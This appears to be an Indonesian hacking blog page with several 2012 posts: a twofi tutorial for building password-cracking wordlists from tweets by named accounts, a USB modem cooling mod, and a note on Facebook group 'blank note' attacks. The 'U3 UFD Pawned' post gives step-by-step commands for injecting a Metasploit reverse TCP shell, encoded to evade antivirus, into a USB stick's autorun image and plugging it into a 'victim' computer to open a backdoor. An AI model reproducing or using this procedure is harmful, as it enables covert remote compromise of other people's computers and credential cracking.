9.02.2012

Membuat Wordlist Dengan TWOFI di Backtrack

Siapa yg tak kenal dengan twitter, berdiri sejak tahun 2006 seketika mendapat sambutan luas di dunia maya. Hingga sekarang istilah follow me, RT menjadi kata2 yang rutin diketik dan muncul oleh para usernya, tak hanya hitungan detik, sepersekian sekon jutaan twit terlontar melalui media ini. didukung olehbanyak device yang mendukung aplikasi ini serta kemudahan lainnya, twitter terbukti mampu merombak cara komunikasi kita saat ini. tapi hal ini juga membawa dampak buruk kecanduan pada para penggunanya.

Namun seorang researcher di bidang IT, Joshua Dustin melihat hal ini dengan cara yang berbeda. Dia memandang jutaan kata yang terlontar lewat akun twitter memiliki potensi untuk meng_generate worldlist guna memecahkan enkripsi sebuah data. Dalam blognya ia memperlihatkan bagaimana twitter menjadi gudang kosa kata dalam pembuatan wordlist untuk cracking dan kemudian ia kembangkan menjadi dsatu aplikasi bernama "twofi".
Relevan pemaparan singkat diatas, maka dalam postingan kali ini saya sedikit mengulas bagamana pemakaian twofi...ok here we go

requirement:
  • PC/notebook yg sudah memakai Linux OS (dalam hal ini saya menggunakan backtrack 5 r2...blum upgrade)
  • Aplikasi twofi
  • list user twitter yang akan digunakan dalam proses pembuatan wordlist (sy menggunakan string yg bersumber dr beraneka macam user mulai akun berita hingga public figure yakni "detikcom,tvOneNews,korantempo,desianwar,boediono,enda,tifsembiring,nukman,budip,triomacan2000")
Step
- Login sebagai root dan instal twofi dr repo (jika anda telah menggunakan Backtrack 5 R3, step ini bisa anda skip)
apt-get install twofi

- Jalankan twofi di menu

backtrack - privilege escalation - passwords Attacks - offline Attacks - twofi


disini kita akan lihat beberapa option bantuan tentang penggunaan twofi
-c : akan memperlihatkan jumlah frekuensi kemunculan sebuah kata2 dlm sebuah akun twitter (ex: -c )
-m : set jumlah minimal huruf dalam satu kata yang akan dipilih/filter kedalam file output wordlist (pemakaian: -m 6 utk min 6 huruf/karakter dlm satu kata)
-T : menggunakan sebuah filelist term
-t : menggunakan  term langsung
-U : utk opsi ini anda harus membuat sebuah file txt yang berisi list target user yg akan digunakan dlm proses pembuatan wordlist (ex: -U /root/listuser.txt ).
contoh file list user : download
-u : opsi ini sebagai alternatif dr opsi -T dimana anda hanya perlu menuliskan nama user tanpa harus menggunakan sebuah file  (ex: -u detikcom,tvOneNews,korantempo )
-v : untuk menggunkan mode verbose


- Proses pembuatan wordlistnynya bisa lewat 2 cara:
*penggunaan tanpa file list user:
ruby twofi.rb -m 6 -u detikcom,tvOneNews,korantempo,desianwar,boediono,enda,tifsembiring,nukman,budip >> /root/newlist.lst

*penggunaan dengan file list user:
ruby twofi.rb -m 6 -U /root/listuser.txt >> root/newlist.lst

dan hasilnya wordlist bisa dilihat di folder root
gedit /root/newlist.lst


OK...slamat mencoba

related link:
http://hack.pauvam.com/rssposts/tag/glen-roberts/
http://www.digininja.org/twofi.php

8.17.2012

U3 UFD Pawned

 Ditahun-tahun yang lalu kita mungkin masih mengingat UFD yang memiliki U3 chipset dapat digunakan sebagai usb tools hacking. beberapa diantaranya dikenal sebagai USB switchblade dan USB Hacksaw dimana program tertentu diinjeksikan kedalam chipset u3 untuk "mengemulasikan cdrom drive" yang akan mengeksekusi program yg diinjeksikan tersebut (autoplay). output yg dihasilkan oleh program ini berupa informasi2 hash password LSA, IP information, browser history hingga cookie auto fill information.

U3 Pawn masih menggunakan metode yang sama dengan usb switchblade, akan tetapi code program di injeksikan bukan ditujukan untuk memanen informasi2 dari komputer korban melainkan membuat/menjalankan backdoor pada port tertentu. Uniknya proses yang dijalankan berada didumping memory (tidak membuat file baru di komputer korban) sehingga saat dilepas dari komputer korban background prosesnya masih tetapa berjalan selama masih dalam sesi yang sama (tidak di restart)..

 Requirement    :
  • UFD yang mendukung U3, ex: UFD bermerk Sandisk, Kingston (tipe lama)...
  • Linux yg memiliki Metasploit (ex: Backtrack)
  • U3 Tool (ada di repo Backtrack)
  • U3 Pwn.tar.gz (http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz)

The step:
- Masukkan UFD U3 anda ke usb port.
- Install U3 tool kedalam Linux anda
apt-get install u3-tool

- Download U3 Pwn.tar.gz
wget http://dl.packetstormsecurity.net/UNIX/utilities/U3-Pwn.tar.gz

- Ekstrak U3-Pwn.tar.gz
wget tar xzvf U3-Pwn.tar.gz

- Jalankan U3-pwn.tar.gz
cd  /root/U3-Pwn
python U3-Pwn.py

- Pilih 1 untuk men-Generate & Replace Iso Image
Enter the number: 1

- Pilih 1 untuk memilih payload exploit (Windows Shell Reverse_TCP) yang akan dijalankan
   Enter number: 1


- Pilih 2 untuk memilih shikata_ga_nai sebagai encoder untuk melewati firewall dan antivirus.
Enter the number: 1

- Masukkan no ip host anda serta port backdoorny, ip lan atau bisa juga ip publik yang anda dapatkan dari ISP
ex: dalam kasus ini saya menggunakan backtrack sebagai host  yang mendapatkan ip  192.168.56.101 sedangkan korban memiliki IP 192.168.56.1
 Enter Ip Address for reverse listener: 192.168.56.101

 Enter the port of the Listener: 4444

- Masukkan letak UFD di linux ex:sdb1
   Enter the device to change iso image on (example /dev/sde1): /dev/sdb1

                                                                             
          ~    .__ °.__   0       o                    ^   .__ °__  `´       
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__. 
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  | 
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O| 
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____| 
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´ 

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************


  Generating Shellcode Please Wait...
|**************************************************| 100%
OK


- Pilih yes untuk menjalan exploit handler
Do you want to start a listener to receive the payload yes or no: yes

- Unplug UFD
- Masukkan UFD ke komputer korban
- Tunggu beberapa saat dan komputer korban akan membuka backdoornya untuk komputer host....selanjutnya terserah anda...:))


related link:
http://packetstormsecurity.org/files/114502/U3-Pwn-Sandisk-Executable-Injection-Tool.html

7.24.2012

Ur Group Still Blank!!! take a look this table

7.23.2012

Long Life My USB Modem

Bila di tanya berapa lama anda menggunkan internet dalam sehari, maka jawaban 1 jam mungkin adalah jawaban yang amat sangat langka saat ini. Di limpahi berbagai kemudahan, mulai dari harga komputer atau notebook yang relatif murah hingga modem portable dengan jaringan 3G yang cukup mumpuni untuk melakukan berbagai kegiatan.

Namun seperti peralatan elektronik lainnya notebook dan usb modem juga akan mengalami perlambanan kinerja jika dalam satu sesi di pakai dalam waktu yang lama dan untuk kerja yang berat. Panas yang dipicu oleh durasi yang berlebihan tak jarang mengakibat kerusakan fisik komponen.
Postingan kali ini saya bakal kasih penampakan modem yang biasa saya gunakan...mudah-mudahan bisa memberi inspirasi buat oprek2 modem anda...

Spoiler
 Tampilan setengah jadi sebelum dipasangi external antenna

Part bekas heatsink power supply buat jadi docking (dudukan)
heatsink bekas processor PI

setelah di potong menjadi dua bagian
kawat tembaga untuk menjepit modem dengan bagian heatsink

Tampilan jadi yang sudah menggunakan eksternal antenna


nb: cara membuat sendiri pigtail external antenna bisa di temukan disini 

7.15.2012

penanganan blank facebook group (video tutorial)

Beberapa waktu yang lalu, dibeberapa group facebook merebak sebuah fenomena baru yakni kosongnya halaman group. Posting status hingga komentar dari member ataupun admin dr group tersebut. Merujuk pada salah satu group yang saya ikuti masalah ini terjadi lantaran adanya malicious code dalam note fb (note blank) yg dishare atau di post dalam komentar di dalam group.Setelah melakukan googling dan searching, akhirnya ditemukan cara-cara yang bisa digunakan untuk mengatasinya.

ada bebrapa catatan yg patut diperhatikan sebelum mengikuti tutorial ini:
  • Serangan yg dilakukan dalam tutorial ini dilakukan pada group yg saya buat sendiri (bukan ke group lain).
  • Link url note fb yg digunakan bukan milik saya dan mungkin saja saat ini sudah dihapus oleh pemilikna. 
  • Penghapusan posting yang bersifat "status" yg bermasalah hanya dapat dilakukan admin group, sedangkan penghapusan komentar yang mengandung url note blank bisa di hapus oleh pengomentar sendiri (tidak harus admin)
  • di dalam "test blank" group dlm video di bawah yg menjadi penyerang sekaligus admin group adalah blogger sendiri.



thanks to: Balikita Forum (andre pangestu, wi, al kahfi dkk), Hacker Community (Mulyana sandi, Pak de agus purnomo, bli Putu Shinoda dkk), X-calibur (rastri, dkk)

related post: Ur Group Still Blank!!! take a look this table

Twitter Delicious Facebook Digg Stumbleupon Favorites More